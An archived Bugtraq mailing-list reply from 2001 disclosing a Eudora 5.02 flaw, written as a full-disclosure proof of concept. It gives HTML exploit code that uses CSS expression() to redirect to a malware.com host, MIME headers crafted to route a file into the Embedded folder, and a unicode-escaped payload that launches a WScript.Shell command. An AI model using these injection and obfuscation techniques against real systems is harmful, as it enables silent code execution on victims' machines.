Bugtraq mailing list archives
Re: feeble.you!dora.exploit
From: "http-equiv () excite com" <http-equiv () excite com>
Date: Wed, 21 Mar 2001 07:48:28 -0800
Further to all of this, we include a generic more illustrative (and user friendly test working example) [at the end of this batch of quotes]. This defeats the so-called "Allow executables in HTML content" being disabled. Example at the end of this screed. On Tue, 20 Mar 2001 11:23:48 -0800 (PST), http-equiv () excite com wrote: | |Jeff Beckley wrote: | | | |>At 01:38 AM 3/18/2001 -0800, http-equiv () excite com wrote: | |>Silent delivery and installation of an executable on a target | |>computer. No client input other than opening an email using | |>Eudora 5.02 - Sponsored Mode provided 'use Microsoft viewer' | |>and 'allow executables in HTML content' are enabled. | | | | | |The "Allow executables in HTML content" setting is turned off by | |default. The online help and user manual mention that the | |setting should remain off for security reasons. | | This of course is 100% correct. Unfortunately on closer | examination we find | that this too can be defeated quite easily. Consider the following | non-JavaScript: | | | <!doctype html public "-//w3c//dtd html 4.0 transitional//en"> | | <img SRC="file://C:\WINDOWS\APPLIC~1\QUALCOMM\EUDORA\Embedded\malware.gif" | height=2 width=2 | STYLE="left:expression(location.href='http://www.malware.com');"></html> | | <br> | <br> | </body></html> | | This slips through, with "Allow executables in HTML content" |disabled. | therefore the results will be the same: | | <img SRC="" height=1 width=1 | STYLE="left:expression (malware.location.href='cid:malware.com');"></ | | ...etc | | Disable the 'Microsoft Viewer" thing. That's the problem. | | A good repair can be by reviewing all the necessary tricks to inject | JavaScript into Hotmail Accounts. These are well documented here and dating | back for quite some time. It appears the mail client seeks typical script | tags, which is defeated as above. Additional you might want to not allow a | crafted inline file to transfer automatically to your embedded folder: | | Content-Type: application/octet-stream; charset=iso-8859-1 | Content-ID: <malware.com> | Content-Transfer-Encoding: base64 | Content-Disposition: inline; filename="You!DORA.html" | | We note that if the content-type is manipulated we can route the file to the | 'Embedded' folder. Casual observation suggests image files and *.exe are | routed there. While *.html is not, hence the constructed Content-Type: | application/octet-stream; charset=iso-8859-1 while the file is: | Content-Disposition: inline; filename="You!DORA.html" | | | --- | http://www.malware.com | | This is specifically constructed to fire the ActiveX warning so that it is visually illustrated (harmless WSH to fire telnet if you click okay) REPEAT: this is by design and only for illustrative purposes (lest some idiot complain this demo has a warning and is a lame "exploit"). <img SRC="cid:malware.com" height=2 width=2 STYLE="left:expression(document.write('\u0020\u0020\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u0076\u0061\u0072\u0020\u0077\u0073\u0068\u003d\u006e\u0065\u0077\u0020\u0041\u0063\u0074\u0069\u0076\u0065\u0058\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0027\u0057\u0053\u0063\u0072\u0069\u0070\u0074\u002e\u0053\u0068\u0065\u006c\u006c\u0027\u0029\u003b\u0020\u0020\u0077\u0073\u0068\u002e\u0052\u0075\u006e\u0028\u0027\u0074\u0065\u006c\u006e\u0065\u0074\u002e\u0065\u0078\u0065\u0027\u0029\u003b\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u003c\u0021\u002d\u002d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u006d\u0061\u006c\u0077\u0061\u0072\u0065\u002e\u0063\u006f\u006d\u0020\u0032\u0032\u002e\u0030\u0032\u002e\u0030\u0031\u0020\u002d\u002d\u003e'))"> Once again: Tested on win98, IE5.5, "Eudora 5.0.2 -- Sponsored Mode", "Microsoft Viewer" enabled, "Allow executables in HTML content" DISABLED. end call --- http://www.malware.com _______________________________________________________ Send a cool gift with your E-Card http://www.bluemountain.com/giftcenter/
Current thread:
- feeble.you!dora.exploit http-equiv () excite com (Mar 19)
- Re: feeble.you!dora.exploit Jeff Beckley (Mar 20)
- <Possible follow-ups>
- Re: feeble.you!dora.exploit http-equiv () excite com (Mar 21)
- Re: feeble.you!dora.exploit http-equiv () excite com (Mar 21)
- Re: feeble.you!dora.exploit Jeff Beckley (Mar 22)